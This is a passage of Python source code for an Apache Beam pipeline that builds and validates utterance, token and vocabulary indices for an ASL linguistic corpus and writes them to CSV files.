      'corpus_document_participant_doc_id_asl_consultant_id_mapping': corpus_document_participant_doc_id_asl_consultant_id_mapping,
      'corpus_document_participant_utterance_mapping': corpus_document_participant_utterance_mapping
    })
    | "Beam PL: merge corpus_document_participant_doc_id_asl_consultant_id_mapping and corpus_document_participant_utterance_mapping" >> beam.CoGroupByKey()
    # the above produces tuples of the form:
    #   (
    #     (<corpus doc filename>, <participant name>), 
    #     {
    #       'corpus_document_participant_doc_id_asl_consultant_id_mapping': [(<corpus doc id>, <asl consultant id>)], # note that this list should always only have a single tuple
    # 
    #       'corpus_document_participant_utterance_mapping': [
    #         (<utterance seq id>, <utterance linguistic token sequence text>, <utterance English translation>, <utterance start time>, <utterance end time>) # there are many of these
    #       ]
    #     }
    #   )
    | "Beam PL: 'explode' corpus_document_participant_utterance_mapping list from merge result" >> beam.Map(
        lambda merged_mapping_tpl: [
          (
            merged_mapping_tpl[0],
            (
              merged_mapping_tpl[1]['corpus_document_participant_doc_id_asl_consultant_id_mapping'][0],
              corpus_document_participant_utterance_mapping
            ),
          ) for corpus_document_participant_utterance_mapping in merged_mapping_tpl[1]['corpus_document_participant_utterance_mapping']
        ]
      )
    | "Beam PL: 'explode' doc_participant_utterances lists" >> beam.FlatMap(
        lambda list_doc_participant_utterances_tpl: list_doc_participant_utterances_tpl
      ) # produces tuples of the form (('football.xml', 'Michael Schlang'), ((32, 1), (54, '...it can create many things.', 189800, 191733)))
    | "Beam PL: apply schema to doc_participant_utterance rows" >> beam.Map(
        lambda doc_participant_utterances_tpl: beam.Row(
          Filename=doc_participant_utterances_tpl[0][0],
          DocumentID=int(doc_participant_utterances_tpl[1][0][0]),
          ParticipantName=doc_participant_utterances_tpl[0][1],
          ASLConsultantID=int(doc_participant_utterances_tpl[1][0][1]),
          UtteranceSequence=doc_participant_utterances_tpl[1][1][0],
          StartTime=doc_participant_utterances_tpl[1][1][3],
          EndTime=doc_participant_utterances_tpl[1][1][4],
          Tokens=doc_participant_utterances_tpl[1][1][1],
          Translation=doc_participant_utterances_tpl[1][1][2]
        )
      )
    # debug
    # | "Beam PL: print document_asl_consultant_utterance_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter("document_asl_consultant_utterance_index_schemad_pcoll entry"))
  )
  return document_asl_consultant_utterance_index_schemad_pcoll
def pl__7__write_document_asl_consultant_utterance_index_csv(document_asl_consultant_utterance_index_schemad_pcoll, d_pl_options):
  """
  Writes the document/ASL-consultant/utterance index to its CSV file.

  Projects the SCHEMA_COL_NAMES__UTTERANCE_DS columns out of the schemad pcoll,
  drops duplicate rows, sorts them, re-applies a minimal schema, renders each
  row as a CSV string, and hands the result to the shared CSV writer.

  Args:
    document_asl_consultant_utterance_index_schemad_pcoll: pcoll of beam.Row
      carrying (at least) DocumentID, ASLConsultantID, UtteranceSequence,
      StartTime, EndTime, Tokens, and Translation fields.
    d_pl_options: pipeline-options dict forwarded to the CSV writer.

  Returns:
    The result of beam__common.pl__X__write_pcoll_to_csv
    (the utterance-index CSV path).
  """
  distinct_utterance_rows = (
    document_asl_consultant_utterance_index_schemad_pcoll
    | "Beam PL: extract SCHEMA_COL_NAMES__UTTERANCE_DS columns from document_asl_consultant_utterance_index_schemad_pcoll" >> beam.Map(
        lambda schemad_row: (
          # column order follows SCHEMA_COL_NAMES__UTTERANCE_DS
          schemad_row.DocumentID,
          schemad_row.ASLConsultantID,
          schemad_row.UtteranceSequence,
          schemad_row.StartTime,
          schemad_row.EndTime,
          schemad_row.Tokens,
          schemad_row.Translation
        )
      )
    | "Beam PL: select distinct document_asl_consultant_utterance_index rows" >> beam.Distinct()
  )
  sorted_utterance_rows = beam__common.pl__X__sort_pcoll(distinct_utterance_rows, pcoll_label="distinct_document_asl_consultant_utterance_index")
  utterance_csv_rows = (
    sorted_utterance_rows
    | "Beam PL: apply minimal schema to create final document_asl_consultant_utterance_index_schemad_pcoll of distinct rows" >> beam.Map(
        lambda utterance_tpl: beam.Row(
          DocumentID=int(utterance_tpl[0]),
          ASLConsultantID=int(utterance_tpl[1]),
          UtteranceSequence=int(utterance_tpl[2]),
          StartTime=int(utterance_tpl[3]),
          EndTime=int(utterance_tpl[4]),
          Tokens=utterance_tpl[5],
          Translation=utterance_tpl[6]
        )
      )
    | beam.Map(lambda utterance_row: beam__common.beam_row_to_csv_string(utterance_row))
  )
  return beam__common.pl__X__write_pcoll_to_csv(
    utterance_csv_rows,
    "DOCUMENT-ASLCONSULTANT-UTTERANCE-INDEX",
    fidscs_globals.UTTERANCE_DS_FNAME,
    fidscs_globals.SCHEMA_COL_NAMES__UTTERANCE_DS,
    d_pl_options
  ) # document_asl_consultant_utterance_index_csv_path
def validate_preprocess_merged_corpus_doc_asl_consultant_utterance_token(merged_doc_participant_utterance_token):
  """
  Validates one CoGroupByKey merge result and flattens it into keyed token tuples.

  merged_doc_participant_utterance_token:
    (
      (<document fname>, <participant name>), # key
      {
        'utterance_token_mapping': [(
          <utterance seq id>,
          <token linguistic text>,
          <token (new) seq id>,
          <token start time>,
          <token end time>
        )],
        'document_id_asl_consultant_id_mapping': [(
          <corpus doc id>,
          <asl consultant id>
        )]
      }
    )

  return: listof(
      (
        (<corpus doc id>, <asl consultant id>, <utterance seq id>, <token seq id>), # key
        # associated data (validated)
        (<document fname>, <participant name>, <token linguistic text>, <token start time>, <token end time>)
      )
    )

  On any validation failure the (differently shaped) input tuple is returned
  as-is, which deliberately breaks the downstream pipeline so the problem is
  surfaced instead of silently dropped.
  """
  doc_fname = merged_doc_participant_utterance_token[0][0]
  if len(doc_fname) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid doc_fname {doc_fname}!")
    return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
  participant_name = merged_doc_participant_utterance_token[0][1]
  if len(participant_name) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid participant_name {participant_name}!")
    return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
  utterance_token_mapping = merged_doc_participant_utterance_token[1]['utterance_token_mapping']
  document_id_asl_consultant_id_mapping = merged_doc_participant_utterance_token[1]['document_id_asl_consultant_id_mapping']
  if len(document_id_asl_consultant_id_mapping) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} does not have a (<corpus doc id>, <asl consultant id>) association!")
    return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
  # there should always be exactly ONE distinct, valid (<corpus doc id>, <asl consultant id>)
  # in document_id_asl_consultant_id_mapping
  distinct_doc_ids = []
  distinct_asl_consultant_ids = []
  for document_id_asl_consultant_id_mapping_instance in document_id_asl_consultant_id_mapping:
    _doc_id = document_id_asl_consultant_id_mapping_instance[0]
    if isinstance(_doc_id, int) and _doc_id > -1 and _doc_id not in distinct_doc_ids:
      distinct_doc_ids.append(_doc_id)
    _asl_consultant_id = document_id_asl_consultant_id_mapping_instance[1]
    if isinstance(_asl_consultant_id, int) and _asl_consultant_id > -1 and _asl_consultant_id not in distinct_asl_consultant_ids:
      distinct_asl_consultant_ids.append(_asl_consultant_id)
  # fix: the original only rejected >1 entries, so zero valid entries (all ids
  # malformed) crashed with IndexError below; require exactly one of each
  if len(distinct_doc_ids) != 1 or len(distinct_asl_consultant_ids) != 1:
    # fix: zip(...) must be materialized, otherwise the f-string prints "<zip object ...>"
    multiple_associations = list(zip(distinct_doc_ids, distinct_asl_consultant_ids))
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} (<corpus doc id>, <asl consultant id>) association is not unique/valid! It has the following (<corpus doc id>, <asl consultant id>) associations: {multiple_associations}")
    return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
  doc_id = distinct_doc_ids[0]
  asl_consultant_id = distinct_asl_consultant_ids[0]
  if len(utterance_token_mapping) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} is not associated with an utterance_token_mapping!")
    return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
  validated_results = []
  for utterance_token_mapping_instance in utterance_token_mapping:
    _utterance_seq_id = utterance_token_mapping_instance[0]
    if not isinstance(_utterance_seq_id, int) or _utterance_seq_id < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _utterance_seq_id {_utterance_seq_id} in utterance_token_mapping!")
      return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
    _token_ling_text = utterance_token_mapping_instance[1]
    if len(_token_ling_text) == 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _token_ling_text {_token_ling_text} in utterance_token_mapping!")
      return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
    _token_new_seq_id = utterance_token_mapping_instance[2]
    if not isinstance(_token_new_seq_id, int) or _token_new_seq_id < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _token_new_seq_id {_token_new_seq_id} in utterance_token_mapping!")
      return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
    _token_start_time = utterance_token_mapping_instance[3]
    if not isinstance(_token_start_time, int) or _token_start_time < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _token_start_time {_token_start_time} in utterance_token_mapping!")
      return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
    _token_end_time = utterance_token_mapping_instance[4]
    if not isinstance(_token_end_time, int) or _token_end_time < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _token_end_time {_token_end_time} in utterance_token_mapping!")
      return merged_doc_participant_utterance_token # this will throw an exception since other validation rows are differently shaped
    validated_results.append(
      (
        (doc_id, asl_consultant_id, _utterance_seq_id, _token_new_seq_id),
        (doc_fname, participant_name, _token_ling_text, _token_start_time, _token_end_time)
      )
    )
  return validated_results
def validate_preprocess_document_asl_consultant_utterance_token_tpl(document_asl_consultant_utterance_token_tpl):
  """
  Validates one vocabulary/occurrence CoGroupByKey merge result and flattens it.

  document_asl_consultant_utterance_token_tpl:
    (
      <token linguistic text>,
      {
        'vocabulary_token_id_map': [<vocab token id>],
        'doc_participant_utterance_token_info_map': [(
          <corpus doc id>,
          <document fname>,
          <asl consultant id>,
          <participant name>,
          <utterance seq id>,
          <token (new) seq id>,
          <token start time>,
          <token end time>
        )]
      }
    )

  return:
    listof(
      (
        <corpus doc id>,
        <corpus document fname>,
        <asl consultant id>,
        <participant name>,
        <utterance seq id>,
        <vocab token id>,
        <token linguistic text>,
        <token (new) seq id>,
        <token start time>,
        <token end time>
      )
    )

  On any validation failure the (differently shaped) input tuple is returned
  as-is, which deliberately breaks the downstream pipeline so the problem is
  surfaced instead of silently dropped.
  """
  token_ling_text = document_asl_consultant_utterance_token_tpl[0]
  if len(token_ling_text) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl key is invalid: {token_ling_text}!")
    return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
  vocabulary_token_id_map = document_asl_consultant_utterance_token_tpl[1]['vocabulary_token_id_map']
  if len(vocabulary_token_id_map) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) does not have a <vocab token id> association!")
    return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
  doc_participant_utterance_token_info_map = document_asl_consultant_utterance_token_tpl[1]['doc_participant_utterance_token_info_map']
  if len(doc_participant_utterance_token_info_map) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) does not have a doc_participant_utterance_token_info_map!")
    return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
  # there should be exactly ONE distinct, valid <vocab token id> for this token
  distinct_token_ids = []
  for _vocab_token_id in vocabulary_token_id_map:
    if isinstance(_vocab_token_id, int) and _vocab_token_id > -1 and _vocab_token_id not in distinct_token_ids:
      distinct_token_ids.append(_vocab_token_id)
  # fix: the original only rejected >1 ids, so zero valid ids (all entries
  # malformed) crashed with IndexError below; require exactly one
  if len(distinct_token_ids) != 1:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) <vocab token id> association is not unique/valid! It has the following <vocab token id> associations: {distinct_token_ids}")
    return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
  vocab_token_id = distinct_token_ids[0]
  validated_results = []
  for doc_participant_utterance_token_info_map_instance in doc_participant_utterance_token_info_map:
    _corpus_doc_id = doc_participant_utterance_token_info_map_instance[0]
    if not isinstance(_corpus_doc_id, int) or _corpus_doc_id < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _corpus_doc_id {_corpus_doc_id} in doc_participant_utterance_token_info_map!")
      return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
    _doc_fname = doc_participant_utterance_token_info_map_instance[1]
    if len(_doc_fname) == 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _doc_fname {_doc_fname} in doc_participant_utterance_token_info_map!")
      return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
    _asl_consultant_id = doc_participant_utterance_token_info_map_instance[2]
    if not isinstance(_asl_consultant_id, int) or _asl_consultant_id < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _asl_consultant_id {_asl_consultant_id} in doc_participant_utterance_token_info_map!")
      return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
    _participant_name = doc_participant_utterance_token_info_map_instance[3]
    if len(_participant_name) == 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _participant_name {_participant_name} in doc_participant_utterance_token_info_map!")
      return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
    _utterance_seq_id = doc_participant_utterance_token_info_map_instance[4]
    if not isinstance(_utterance_seq_id, int) or _utterance_seq_id < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _utterance_seq_id {_utterance_seq_id} in doc_participant_utterance_token_info_map!")
      return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
    _token_new_seq_id = doc_participant_utterance_token_info_map_instance[5]
    if not isinstance(_token_new_seq_id, int) or _token_new_seq_id < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _token_new_seq_id {_token_new_seq_id} in doc_participant_utterance_token_info_map!")
      return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
    _token_start_time = doc_participant_utterance_token_info_map_instance[6]
    if not isinstance(_token_start_time, int) or _token_start_time < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _token_start_time {_token_start_time} in doc_participant_utterance_token_info_map!")
      return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
    _token_end_time = doc_participant_utterance_token_info_map_instance[7]
    if not isinstance(_token_end_time, int) or _token_end_time < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _token_end_time {_token_end_time} in doc_participant_utterance_token_info_map!")
      return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows are differently shaped
    validated_results.append(
      (
        _corpus_doc_id,
        _doc_fname,
        _asl_consultant_id,
        _participant_name,
        _utterance_seq_id,
        vocab_token_id,
        token_ling_text,
        _token_new_seq_id,
        _token_start_time,
        _token_end_time
      )
    )
  return validated_results
def pl__6__create_document_asl_consultant_utterance_token_index_schemad_pcoll(ss_parsed_xmldb_pcoll, document_asl_consultant_index_schemad_pcoll, d_pl_options):
  """
  Builds the corpus vocabulary and the utterance-token occurrence index.

  Args:
    ss_parsed_xmldb_pcoll: pcoll of dicts, one per parsed corpus document; keys
      read here are 'CORPUS_DOCUMENT_FILENAME' and 'PARTICIPANT_SEQUENCE' (each
      participant dict holding 'PARTICIPANT_NAME' plus nested
      'UTTERANCE_SEQUENCE'/'TOKEN_SEQUENCE' entries).
    document_asl_consultant_index_schemad_pcoll: schemad pcoll associating
      (Filename, ParticipantName) with (DocumentID, ASLConsultantID).
    d_pl_options: pipeline-options dict; not referenced in this function body —
      presumably kept for signature parity with sibling pl__* builders.

  Returns:
    A two-tuple of pcolls:
      vocabulary_index_pcoll: beam.Row(TokenID, Token), one row per distinct
        token linguistic text across the corpus.
      document_asl_consultant_utterance_token_index_schemad_pcoll: beam.Row(
        DocumentID, DocumentFilename, ASLConsultantID, ParticipantName,
        UtteranceSequence, TokenSequence, StartTime, EndTime, TokenID,
        Field, FieldValue), one row per token occurrence within an utterance.
  """
  doc_participant_utterance_token_mapping = (
    ss_parsed_xmldb_pcoll
    | "Beam PL: get token associated with this ss_parsed_xmldb, participant, utterance, keyed by doc filename, participant name, utterance seq id, token linguistic text" >> beam.Map(
        lambda ss_parsed_xmldb_pcoll_row_dict: [
          (
            (
              doc_participant_utterance_token_tpl[0], # <corpus doc filename>
              doc_participant_utterance_token_tpl[1], # <participant name>
              doc_participant_utterance_token_tpl[2], # <utterance seq id>
              doc_participant_utterance_token_tpl[4], # <token linguistic text> (ascii representation of the byte-string)
            ), # key
            (
              doc_participant_utterance_token_tpl[3], # <token (new) seq id>
              doc_participant_utterance_token_tpl[5], # <token start time>
              doc_participant_utterance_token_tpl[6], # <token end time>
            ) # token data
          ) for doc_participant_utterance_token_tpl in [
            (
              ss_parsed_xmldb_pcoll_row_dict['CORPUS_DOCUMENT_FILENAME'],
              d_participant['PARTICIPANT_NAME'],
              utterance_seq_id,
              token_new_seq_id,
              # NOTE: 'TOKEN_LINGUSTIC_TEXT' (sic) is the key actually produced
              # upstream — do not "fix" the spelling here
              d_token['TOKEN_LINGUSTIC_TEXT'], # we get an ascii representation of the byte-string
              d_token['TOKEN_START_TIME'],
              d_token['TOKEN_END_TIME']
            ) for d_participant in ss_parsed_xmldb_pcoll_row_dict['PARTICIPANT_SEQUENCE']
              for utterance_seq_id, d_utterance in enumerate(d_participant['UTTERANCE_SEQUENCE'])
                for token_new_seq_id, d_token in enumerate(d_utterance['TOKEN_SEQUENCE'])
          ]
        ]
      ) # outputs pcoll with each row list of ((<corpus doc filename>, <participant name>, <utterance seq id>, <token linguistic text>), (<token (new) seq id>, <token start time>, <token end time>))
    | "Beam PL: 'explode' list of doc_participant_utterance_token_mapping tuples" >> beam.FlatMap(lambda list_doc_participant_utterance_token_mapping_tpl: list_doc_participant_utterance_token_mapping_tpl)
    # the above produces a pcoll with rows as:
    #   ((<corpus doc filename>, <participant name>, <utterance seq id>, <token linguistic text>), (<token (new) seq id>, <token start time>, <token end time>))
    | "Beam PL: select distinct doc_participant_utterance_token_mapping tuples" >> beam.Distinct()
    # debug
    # | "Beam PL: print doc_participant_utterance_token_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("doc_participant_utterance_token_mapping entry"))
  )
  # now extract distinct token linguistic text from doc_participant_utterance_token_mapping to build the final vocabulary index
  ling_text_pcoll = (
    doc_participant_utterance_token_mapping
    # ((<corpus doc filename>, <participant name>, <utterance seq id>, <token linguistic text>), (<token (new) seq id>, <token start time>, <token end time>))
    | "Beam PL: extract token linguistic text" >> beam.Map(lambda doc_participant_utterance_token_mapping_row_tpl: doc_participant_utterance_token_mapping_row_tpl[0][3])
    | "Beam PL: select distinct token linguistic text" >> beam.Distinct()
  )
  # assign each distinct linguistic text a stable integer id (the vocab token id)
  indexed_ling_text = beam__common.pl__X__index_pcoll(ling_text_pcoll, "ling_text_pcoll")
  # the above produces tuples of the form:
  #   (<vocab token id>, <vocab token linguistic text>)
  vocabulary_index_pcoll = (
    indexed_ling_text
    | "Beam PL: apply schema to vocabulary_index_pcoll rows" >> beam.Map(
        lambda vocabulary_index_pcoll_row_tpl: beam.Row(
          # SCHEMA_COL_NAMES__VOCABULARY_DS = [
          #   'TokenID',
          #   'Token'
          # ]
          TokenID=int(vocabulary_index_pcoll_row_tpl[0]),
          Token=vocabulary_index_pcoll_row_tpl[1]
        )
      )
    # debug
    # | "Beam PL: print vocabulary" >> beam.ParDo(beam__common.PipelinePcollPrinter("vocabulary token"))
  )
  # re-key the doc/consultant index by (filename, participant name) so it can
  # be CoGroupByKey'd against the token mapping below
  document_asl_consultant_mapping = (
    document_asl_consultant_index_schemad_pcoll
    | beam.Map(
        lambda document_asl_consultant_index_schemad_pcoll_row: (
          (document_asl_consultant_index_schemad_pcoll_row.Filename, document_asl_consultant_index_schemad_pcoll_row.ParticipantName),
          (document_asl_consultant_index_schemad_pcoll_row.DocumentID, document_asl_consultant_index_schemad_pcoll_row.ASLConsultantID)
        )
      ) # outputs rows as ((<corpus doc filename>, <participant name>), (<corpus doc id>, <asl consultant id>))
  )
  doc_participant_utterance_token_mapping_2 = (
    doc_participant_utterance_token_mapping
    # have: ((<corpus doc filename>, <participant name>, <utterance seq id>, <token linguistic text>), (<token (new) seq id>, <token start time>, <token end time>))
    # need: ((<corpus doc filename>, <participant name>), (<utterance seq id>, <token linguistic text>, <token (new) seq id>, <token start time>, <token end time>))
    | beam.Map(
        lambda doc_participant_utterance_token_mapping_row_tpl: (
          (
            doc_participant_utterance_token_mapping_row_tpl[0][0], # <corpus doc filename>
            doc_participant_utterance_token_mapping_row_tpl[0][1] # <participant name>
          ),
          (
            doc_participant_utterance_token_mapping_row_tpl[0][2], # <utterance seq id>
            doc_participant_utterance_token_mapping_row_tpl[0][3], # <token linguistic text>
            doc_participant_utterance_token_mapping_row_tpl[1][0], # <token (new) seq id>
            doc_participant_utterance_token_mapping_row_tpl[1][1], # <token start time>
            doc_participant_utterance_token_mapping_row_tpl[1][2], # <token end time>
          )
        )
      )
  )
  # merge <corpus doc id>, <asl consultant id>, <token (new) seq id>, <token start time>, <token end time>
  merged_doc_participant_utterance_token = (
    ({
      'utterance_token_mapping': doc_participant_utterance_token_mapping_2,
      'document_id_asl_consultant_id_mapping': document_asl_consultant_mapping
    })
    | "Beam PL: merge utterance_token_mapping and document_id_asl_consultant_id_mapping" >> beam.CoGroupByKey()
    # (
    #   (<document fname>, <participant name>), # key
    #   {
    #     'utterance_token_mapping': [(
    #       <utterance seq id>,
    #       <token linguistic text>,
    #       <token (new) seq id>,
    #       <token start time>,
    #       <token end time>
    #     )],
    #     'document_id_asl_consultant_id_mapping': [(
    #       <corpus doc id>,
    #       <asl consultant id>
    #     )]
    #   }
    # )
    | "Beam PL: validate/preprocess merged_doc_participant_utterance_token" >> beam.FlatMap(validate_preprocess_merged_corpus_doc_asl_consultant_utterance_token)
    # the above produces tuples in the form:
    #   ((<corpus doc id>, <asl consultant id>, <utterance seq id>, <token (new) seq id>), (<document fname>, <participant name>, <token linguistic text>, <token start time>, <token end time>))
    # debug
    # | "Beam PL: print validated merged_doc_participant_utterance_token" >> beam.ParDo(beam__common.PipelinePcollPrinter("merged_doc_participant_utterance_token (validated) entry"))
  )
  # transform merged_doc_participant_utterance_token tuples:
  #   have:
  #     ((<corpus doc id>, <asl consultant id>, <utterance seq id>, <token (new) seq id>), (<document fname>, <participant name>, <token linguistic text>, <token start time>, <token end time>))
  #   need:
  #     (<token linguistic text>, (<corpus doc id>, <document fname>, <asl consultant id>, <participant name>, <utterance seq id>, <token (new) seq id>, <token start time>, <token end time>))
  doc_participant_utterance_by_token_ling_text = (
    merged_doc_participant_utterance_token
    | beam.Map(
        lambda merged_doc_participant_utterance_token_row_tpl: (
          merged_doc_participant_utterance_token_row_tpl[1][2], # <token linguistic text> (key)
          (
            merged_doc_participant_utterance_token_row_tpl[0][0], # <corpus doc id>
            merged_doc_participant_utterance_token_row_tpl[1][0], # <document fname>
            merged_doc_participant_utterance_token_row_tpl[0][1], # <asl consultant id>
            merged_doc_participant_utterance_token_row_tpl[1][1], # <participant name>
            merged_doc_participant_utterance_token_row_tpl[0][2], # <utterance seq id>
            merged_doc_participant_utterance_token_row_tpl[0][3], # <token (new) seq id>
            merged_doc_participant_utterance_token_row_tpl[1][3], # <token start time>
            merged_doc_participant_utterance_token_row_tpl[1][4], # <token end time>
          )
        )
      )
  )
  # transform vocabulary_index_pcoll tuples
  #   have:
  #     beam.Row(
  #       # SCHEMA_COL_NAMES__VOCABULARY_DS = [
  #       #   'TokenID',
  #       #   'Token'
  #       # ]
  #       TokenID=int(vocabulary_index_pcoll_row_tpl[0]),
  #       Token=vocabulary_index_pcoll_row_tpl[1]
  #     )
  #   need:
  #     (<token linguistic text>, <vocab token id>)
  vocabulary_by_token_ling_text = (
    vocabulary_index_pcoll
    | beam.Map(
        lambda vocabulary_index_pcoll_row: (
          vocabulary_index_pcoll_row.Token,
          vocabulary_index_pcoll_row.TokenID
        )
      )
  )
  document_asl_consultant_utterance_token_index_schemad_pcoll = (
    ({
      'vocabulary_token_id_map': vocabulary_by_token_ling_text,
      'doc_participant_utterance_token_info_map': doc_participant_utterance_by_token_ling_text
    })
    | "Beam PL: merge vocabulary_by_token_ling_text and doc_participant_utterance_by_token_ling_text" >> beam.CoGroupByKey()
    # the above produces tuples in the form:
    #   (
    #     <token linguistic text>,
    #     {
    #       'vocabulary_token_id_map': [1057],
    #       'doc_participant_utterance_token_info_map': [(
    #         <corpus doc id>,
    #         <document fname>,
    #         <asl consultant id>,
    #         <participant name>,
    #         <utterance seq id>,
    #         <token (new) seq id>,
    #         <token start time>,
    #         <token end time>
    #       )]
    #     }
    #   )
    | "Beam PL: validate/preprocess document_asl_consultant_utterance_token_tpl" >> beam.FlatMap(validate_preprocess_document_asl_consultant_utterance_token_tpl)
    # the above produces tuples in the form:
    #   (
    #     <corpus doc id>,
    #     <document fname>,
    #     <asl consultant id>,
    #     <participant name>,
    #     <utterance seq id>,
    #     vocab_token_id,
    #     token_ling_text,
    #     _token_new_seq_id,
    #     _token_start_time,
    #     _token_end_time
    #   )
    | "Beam PL: apply schema to document_asl_consultant_utterance_token rows" >> beam.Map(
        lambda document_asl_consultant_utterance_token_tpl: beam.Row(
          # SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS = [
          #   'DocumentID',
          #   'ASLConsultantID',
          #   'UtteranceSequence',
          #   'TokenSequence',
          #   'StartTime',
          #   'EndTime',
          #   'TokenID',
          #   'Field',
          #   'FieldValue'
          # ]
          # note the deliberate reordering: tuple indices 7/8/9 carry
          # TokenSequence/StartTime/EndTime, index 5 carries TokenID
          DocumentID=document_asl_consultant_utterance_token_tpl[0],
          DocumentFilename=document_asl_consultant_utterance_token_tpl[1],
          ASLConsultantID=document_asl_consultant_utterance_token_tpl[2],
          ParticipantName=document_asl_consultant_utterance_token_tpl[3],
          UtteranceSequence=document_asl_consultant_utterance_token_tpl[4],
          TokenSequence=document_asl_consultant_utterance_token_tpl[7],
          StartTime=document_asl_consultant_utterance_token_tpl[8],
          EndTime=document_asl_consultant_utterance_token_tpl[9],
          TokenID=document_asl_consultant_utterance_token_tpl[5],
          Field='', # blank for now
          FieldValue='' # blank for now
        )
      )
    # debug
    # | "Beam PL: print document_asl_consultant_utterance_token_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter("document_asl_consultant_utterance_token_index_schemad_pcoll entry"))
  )
  return vocabulary_index_pcoll, document_asl_consultant_utterance_token_index_schemad_pcoll
def pl__7__write_vocabulary_index_csv(vocabulary_index_pcoll, d_pl_options):
  """
  Sorts the vocabulary index, renders each row as a CSV string, and writes
  the vocabulary-index CSV file.

  Args:
    vocabulary_index_pcoll: pcoll of beam.Row(TokenID, Token).
    d_pl_options: pipeline-options dict forwarded to the CSV writer.

  Returns:
    The result of beam__common.pl__X__write_pcoll_to_csv
    (the vocabulary-index CSV path).
  """
  sorted_vocab = beam__common.pl__X__sort_pcoll(vocabulary_index_pcoll, pcoll_label="vocabulary_index")
  vocab_csv_rows = (
    sorted_vocab
    | "Beam PL: re-apply schema to sorted_vocabulary_index_pcoll rows" >> beam.Map(
        lambda vocab_row: beam.Row(
          # SCHEMA_COL_NAMES__VOCABULARY_DS = ['TokenID', 'Token']
          TokenID=vocab_row.TokenID,
          Token=vocab_row.Token
        )
      )
    | beam.Map(lambda schemad_vocab_row: beam__common.beam_row_to_csv_string(schemad_vocab_row))
  )
  return beam__common.pl__X__write_pcoll_to_csv(
    vocab_csv_rows,
    "VOCABULARY-INDEX",
    fidscs_globals.VOCABULARY_DS_FNAME,
